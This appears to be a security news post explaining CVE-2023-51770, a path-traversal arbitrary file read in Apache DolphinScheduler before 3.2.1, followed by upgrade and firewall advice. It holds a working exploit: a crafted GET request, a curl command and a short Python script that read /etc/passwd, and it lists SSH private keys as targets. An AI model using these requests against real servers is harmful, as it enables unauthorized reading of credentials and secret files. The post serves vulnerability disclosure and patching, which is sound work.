CVE CyberSecurity Database News

CVE-2023-51770 - Arbitrary File Read Vulnerability in Apache DolphinScheduler (before 3.2.1) – Explained With Exploit & Code!

Poster -

---

Introduction

A new security issue, CVE-2023-51770, was discovered in Apache DolphinScheduler (versions before 3.2.1). This vulnerability lets attackers read *any file* on the server where DolphinScheduler is installed, as long as the server’s DolphinScheduler user can access it. In this post, we’ll break down the details, demonstrate a code exploit example, and guide you to stay safe.

What is Apache DolphinScheduler?

Apache DolphinScheduler is an open-source workflow management platform popular in big data scenarios. It helps teams automate tasks for Spark, Hadoop, Flink, and more.

*Official site:* https://dolphinscheduler.apache.org/

What is CVE-2023-51770?

CVE-2023-51770 is an “arbitrary file read” vulnerability. This means an unauthenticated attacker can read files they aren’t supposed to—like /etc/passwd, configuration, secrets, or SSH keys—simply by making a crafted request to the DolphinScheduler web API.

How Does the Vulnerability Work?

The problem is with the /dolphinscheduler/log/detail API endpoint. Before 3.2.1, it did not check that the requested log file path remained inside an allowed directory. Attackers could use directory traversal sequences (like ../../) in log-related endpoints, forcing the server to return arbitrary files.

Put simply:
If a user can make a web request to the scheduler, they can ask for and receive files – even sensitive ones – from the disk.

The Vulnerable Endpoint

GET /dolphinscheduler/log/detail
     ?taskInstanceId=XXX
     &processInstanceId=XXX
     &logPath=../../../../../../../../etc/passwd

Example Exploit (using curl)

Suppose DolphinScheduler runs at http://example.com:12345.

curl -G "http://example.com:12345/dolphinscheduler/log/detail" \
  --data-urlencode "logPath=../../../../../../../../etc/passwd"

> What happens?
> The scheduler reads /etc/passwd and returns its contents in the HTTP response!

Minimal Python Exploit Code

import requests

url = 'http://example.com:12345/dolphinscheduler/log/detail'
params = {
    'logPath': '../../../../../../../../etc/passwd'
}
response = requests.get(url, params=params)
print(response.text)

What Can Attackers Steal?

- System passwords (/etc/passwd)
- Private keys (/home/user/.ssh/id_rsa)

Database connection strings

If you use credentials or tokens in server files, they might be at risk.

How to Fix It?

Upgrade immediately to DolphinScheduler 3.2.1 or higher.

- Release notes:
https://dolphinscheduler.apache.org/en-us/docs/release/3.2.1/

No patch?
Restrict firewall access to trusted IPs only, and monitor for suspicious log requests.

The Apache Security Announcement:

https://lists.apache.org/thread/xg60pfwkyn9cm6yn3sn8m7cg1ps9ncgy

Mitre CVE:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51770

Full Discuss and Fix Commit:

https://github.com/apache/dolphinscheduler/pull/14680

Conclusion

CVE-2023-51770 is easy to exploit and puts sensitive files and credentials in danger. If you run Apache DolphinScheduler, upgrade ASAP to 3.2.1 or above. Don’t expose scheduler management interfaces to the public internet! And always keep your platforms up-to-date.

Stay safe out there – and patch quickly!

*This post is exclusive to our readers and written in simple language for clarity. If you operate Apache DolphinScheduler, check your version and update today!*

Timeline

Published on: 02/20/2024 10:15:08 UTC
Last modified on: 01/16/2025 19:48:57 UTC